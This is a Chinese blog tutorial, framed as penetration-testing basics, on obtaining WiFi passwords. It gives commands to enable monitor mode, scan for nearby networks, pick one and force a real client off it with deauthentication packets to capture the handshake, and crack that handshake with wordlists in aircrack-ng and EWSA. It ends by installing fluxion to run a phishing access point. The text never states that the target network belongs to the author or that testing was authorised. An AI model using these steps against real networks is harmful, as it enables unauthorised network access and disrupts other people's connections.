渗透测试基础(五) 获取WiFi密码

1. 前提条件

  • 需要无线网卡,kali无法识别电脑自带的网卡。

2. 实验步骤:

2.1 查看网卡

  • 命令:airmon-ng
    在这里插入图片描述

2.2 启动网卡监听模式

  • 命令airmon-ng start wlan0
    在这里插入图片描述
  • 检查下是否处于监听模型:ifconfig查看一下,如果网卡名加上了mon后则成功
    在这里插入图片描述

2.3 扫描周围wifi

  • 命令airodump-ng wlan0mon
    在这里插入图片描述
    • BSSID:路由的MAC地址。
    • PWR:信号强度,越小信号越强。
    • #Data:传输的数据.。
    • CH:信号频道,只有在一个频道才可进行下一步操作。
    • ESSID:wifi的名称,中文的可能会乱码。

2.4 获取wifi密码

  • 选取TP-747进行获取

    • -c:指定信道
    • -w:指定抓去握手包的存放位置或者名字
    • –bssid:指定路由器的MAC
  • 输入airodump-ng -c 1 –bssid A8:5E:45:EF:6F:80 -w /root wlan0mon
    在这里插入图片描述

    • 可见有一个用户正在使用此wifi
    • 另开一个终端
    • 执行如下命令,一个客户机的MAC,和路由器的MAC
      • -a:指定路由器的MAC
      • -c:指定客户机的MAC
  • aireplay-ng -0 2 -a A8:5E:45:EF:6F:80 -c B8:B2:F8:D4:8A:88 wlan0mon
    在这里插入图片描述

  • 这时我们看刚刚的终端,然后ctrl+c 退出抓包
    在这里插入图片描述

  • 来到保存的目录查看刚刚抓的包,这里的后缀不一定和我一样。
    在这里插入图片描述

  • 用kali自带的工具,aircrack-ng root-09.ivs -w pass.txt,如果字典强大就能找到。
    在这里插入图片描述

    • 失败截图
      在这里插入图片描述

    • 成功截图
      在这里插入图片描述

  • 或者使用EWSA来跑字典(可使用GPU,效率更高。)打开EWSA软件
    在这里插入图片描述

  • 导入刚刚抓到的包
    在这里插入图片描述

  • 导入字典
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • fluxion搭建钓鱼wifi获取wifi密码

    • 下载fluxion
      • git clone https://github.com/FluxionNetwork/fluxion.git
    • 进入到fluxion目录
      • cd fluxion
    • 安装fluxion
      • ./fluxion.sh -i 第一次需要安装依赖之后就 - ./fluxion.sh就行
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魂•殿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值